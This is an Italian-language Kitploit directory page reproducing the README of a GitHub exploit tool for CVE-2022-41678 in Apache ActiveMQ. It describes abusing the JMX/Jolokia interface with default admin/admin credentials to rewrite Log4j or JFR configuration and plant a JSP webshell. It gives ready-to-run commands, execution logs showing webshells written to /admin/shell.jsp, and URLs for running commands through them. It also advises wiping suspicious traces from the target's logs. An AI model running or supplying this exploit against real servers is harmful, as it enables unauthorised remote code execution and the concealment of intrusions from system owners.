Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-41678 — CVE-2022-41678 è una vulnerabilità di esecuzione remota di codice in Apache ActiveMQ. Questa vulnerabilità consente a un attaccante di modificare la configurazione di Log4j o la configurazione di JFR (Java Flight Recorder) tramite l'interfaccia JMX (Java Management Extensions), scrivendo così una webshell JSP dannosa nella directory web del server, ottenendo infine l'esecuzione remota di codice. | Kitploit
Strumenti/GitHubGitHub/urjack2025/cve-2022-41678
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHuburjack2025/cve-2022-41678

CVE-2022-41678

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
2211 mesi faNon ancora revisionato

Informazioni

CVE-2022-41678 è una vulnerabilità di esecuzione remota di codice in Apache ActiveMQ. Questa vulnerabilità consente a un attaccante di modificare la configurazione di Log4j o la configurazione di JFR (Java Flight Recorder) tramite l'interfaccia JMX (Java Management Extensions), scrivendo così una webshell JSP dannosa nella directory web del server, ottenendo infine l'esecuzione remota di codice.

Condividi

Strumento di sfruttamento della vulnerabilità Apache ActiveMQ CVE-2022-41678

Panoramica della vulnerabilità

Documentazione di riferimento: https://app.nextcyber.cn/courses/41/tasks/580

CVE-2022-41678 è una vulnerabilità di esecuzione di codice remoto in Apache ActiveMQ. La vulnerabilità consente a un attaccante di modificare la configurazione di Log4j o JFR (Java Flight Recorder) tramite l'interfaccia JMX (Java Management Extensions), scrivendo così una webshell JSP dannosa nella directory web del server, portando infine all'esecuzione di codice remoto.

Questa vulnerabilità colpisce diverse versioni di Apache ActiveMQ, a seconda dell'uso di Log4j e delle configurazioni JFR.

Requisiti ambientali

  • Python 3.6 o superiore
  • Installare le dipendenze necessarie:
    root@kitploit:~
    pip install requests
    
  • Il server ActiveMQ di destinazione deve avere l'interfaccia JMX abilitata (solitamente accessibile tramite il percorso /api/jolokia/)
  • L'attaccante deve conoscere nome utente e password della console ActiveMQ (di default admin/admin)

Utilizzo

Utilizzo di base

Utilizzando le credenziali predefinite admin/admin e la modalità di sfruttamento automatico:

root@kitploit:~
python exp.py http://target:8161

È anche possibile specificare nome utente e password con i parametri -u e -p:

root@kitploit:~
# Utilizzo di Log4j
python exp.py -u admin -p admin http://10.22.174.214:8161

# Risultato dell'esecuzione
python exp.py -u admin -p admin http://10.22.174.214:8161
2025-10-14 22:53:54,115 - INFO - choice MBean 'org.apache.logging.log4j2:type=5faeada1' automatically
2025-10-14 22:53:54,334 - INFO - update log config
2025-10-14 22:53:54,467 - INFO - write webshell to http://10.22.174.214:8161/admin/shell.jsp?cmd=id
2025-10-14 22:53:54,655 - INFO - restore log config

Oltre alla modalità Log4j predefinita, è possibile specificare la modalità JFR con il parametro --exploit jfr.

root@kitploit:~
# Utilizzo della modalità JFR
python exp.py -u admin -p admin --exploit jfr http://10.22.174.214:8161

# Risultato dell'esecuzione
python exp.py -u admin -p admin --exploit jfr http://10.22.174.214:8161/
2025-10-14 23:16:35,978 - INFO - choice MBean jdk.management.jfr:type=FlightRecorder manually
2025-10-14 23:16:37,390 - INFO - create flight record, id = 1
2025-10-14 23:16:37,533 - INFO - update configuration for record 1
2025-10-14 23:16:38,167 - INFO - start record
2025-10-14 23:16:39,243 - INFO - stop record
2025-10-14 23:16:39,309 - INFO - write webshell to http://10.22.174.214:8161/admin/shelljfr.jsp?cmd=id

Verifica del risultato dello sfruttamento

Dopo uno sfruttamento riuscito, è possibile eseguire comandi accedendo ai seguenti URL:

root@kitploit:~
# Webshell scritta tramite Log4j
http://target:8161/admin/shell.jsp?cmd=comando

# Webshell scritta tramite JFR
http://target:8161/admin/shelljfr.jsp?cmd=comando

Ad esempio, per eseguire il comando id:

root@kitploit:~
http://target:8161/admin/shell.jsp?cmd=id

Descrizione dei parametri dello strumento

ParametroAbbreviazioneTipoValore predefinitoDescrizione
--username-ustringaadminNome utente della console ActiveMQ
--password-pstringaadminPassword della console ActiveMQ
--exploit-estringaautoModalità di sfruttamento, valori possibili: auto, log4j, jfr
url-stringa-Indirizzo URL del server ActiveMQ di destinazione (parametro obbligatorio)

Note importanti

  1. Questo strumento è destinato esclusivamente a ricerche di sicurezza e test autorizzati. Non utilizzarlo su sistemi senza autorizzazione.
  2. Dopo uno sfruttamento riuscito, lo strumento tenterà di ripristinare la configurazione originale di Log4j per ridurre al minimo l'impatto sul sistema di destinazione.
  3. Se il sistema di destinazione ha restrizioni di accesso di rete, potrebbe essere necessario modificare la configurazione di rete per garantire l'accesso all'interfaccia JMX.
  4. Versioni diverse di ActiveMQ possono avere percorsi e configurazioni differenti; potrebbe essere necessario adattare i percorsi nello strumento in base alla situazione reale.
  5. Lo strumento opera tramite l'interfaccia JMX, pertanto è necessario che il server ActiveMQ di destinazione abbia questa interfaccia abilitata.
  6. L'esecuzione di questo strumento potrebbe lasciare tracce nei log del sistema di destinazione; si consiglia di pulire eventuali tracce sospette.
Scarica lo strumento